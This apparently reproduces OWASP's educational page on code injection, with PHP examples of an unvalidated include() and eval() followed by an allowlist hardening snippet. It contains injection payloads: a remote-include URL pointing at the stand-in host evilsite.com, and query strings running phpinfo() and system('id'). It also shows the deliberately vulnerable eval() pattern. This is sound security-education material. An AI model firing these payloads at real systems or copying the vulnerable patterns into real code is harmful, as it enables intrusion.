Description
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, they are only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
Risk Factors
These types of vulnerabilities can range from very hard to find to easy to find. If found, they are usually moderately hard to exploit, depending on the scenario.
If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability.
Examples
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function:
http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function, which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute their PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 2
When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.
The example below shows a dangerous way to use the eval() function:
$myvar = "varname";
$x = $_GET['arg'];            // untrusted: taken straight from the query string
eval("\$myvar = \$x;");      // the dollar signs are escaped so eval() receives the text "$myvar = $x;"
As there is no input validation, the code above is vulnerable to a Code Injection attack.
For example: /index.php?arg=1; phpinfo()
While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example: /index.php?arg=1; system('id')
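Both examples fail for the same reason: untrusted request data reaches a code-interpreting function (include() or eval()) without the validation the Description section calls for. The PHP below is an added illustration of the allowlist approach, not code from the OWASP article; the page-name map, the /pages/ directory and the integer format for arg are assumptions for the demonstration.

```php
<?php
// Added example: hardening the two patterns from this page by validating
// untrusted input against an allowlist before it could reach include() or eval().

// Example 1 hardening: never build an include path from raw input.
// Only names in this fixed map can be selected; anything else is rejected,
// so a remote URL such as http://evilsite.com/evilcode.php is never included.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolvePage(string $requested): ?string
{
    // Strict key lookup: no URLs, no "../", no arbitrary file names.
    return ALLOWED_PAGES[$requested] ?? null;
}

// Example 2 hardening: eval() is not needed to assign a value.
// Validate the data format (assumed here: a plain integer) and use an
// ordinary assignment, so "1; phpinfo()" is simply rejected.
function parseArg(string $raw): ?int
{
    // Allowed characters and expected amount of data, as the Description lists.
    if (preg_match('/^-?[0-9]{1,10}$/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// Demonstration with constructed request values (a benign request and the
// two injection attempts shown on this page).
$requests = [
    ['page' => 'contact', 'arg' => '1'],
    ['page' => 'http://evilsite.com/evilcode.php', 'arg' => '1; phpinfo()'],
];

foreach ($requests as $r) {
    $file = resolvePage($r['page']);
    $arg  = parseArg($r['arg']);
    printf("page=%-36s -> %s\n", $r['page'],
        $file === null ? 'REJECTED' : "include /pages/$file");
    printf("arg=%-37s -> %s\n", $r['arg'],
        $arg === null ? 'REJECTED' : "\$myvar = $arg");
}
```

The benign request resolves to contact.php and the integer 1; both injection attempts are rejected before any include or assignment takes place.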
Original source: https://owasp.org/www-community/attacks/Code_Injection